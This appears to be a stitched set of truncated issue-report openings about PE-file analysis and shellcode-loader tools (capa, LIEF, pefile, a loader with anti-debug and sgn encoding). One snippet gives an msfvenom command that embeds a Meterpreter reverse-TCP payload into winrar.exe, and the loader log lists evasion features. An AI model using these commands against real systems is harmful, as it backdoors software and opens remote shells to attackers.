-
how to use this with putty than popcalc or metalsploit payload generated?
-
as a first step to trying out capa - I downloaded capa prebuilt binaries for linux and ran:
```
> ./capa -f pe /usr/bin/ls
```
which emitted the following report:
```
+---------------…
-
`[?] Anti-debug enabled
[?] Syscalls enabled
[?] Payload will be put in .text section
[?] Final shellcode will be encoded with sgn
[?] Waiting 5 seconds before executing the payload
[?] Processin…
-
It's still not work after I modify the DEP to NO,but if i change "PAGE_READONLY" to "PAGE_EXECUTE",all is just good.
(i did not change DEP flag of os,test in windows10)
-
I've been battling with running the python bindings on python 3.5.
I keep getting a `ImportError: ERROR: fail to load the dynamic library.` however I have checked that all libraries are present in …
-
Hi,
Instrumenting binaries for coverage in Windows in challenging, but your tehcnique is promising so have you planned to add support for it?
You can use https://github.com/lief-project/LIEF for ins…
-
## Steps to reproduce
exe file is winrar.exe for www.winrar.com.cn the newest
use command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -x winrar.exe -k -f exe -o win…
-
A simple program compiled with VC2010 (settings: "Use MFC in a Static Library"):
```cpp
#include
#pragma comment (lib, "user32.lib")
#ifdef _M_X64
int __fastcall wWinMain
#else
int __stdcall w…
-
Python version `2.718`
Traceback:
```
Traceback (most recent call):
File "/home/malcore/bin/maltree/lib/settings.py", line 579, in get_sections
mype = pefile.PE(filename)
File "/home/ma…
-
用python构建一个pe文件格式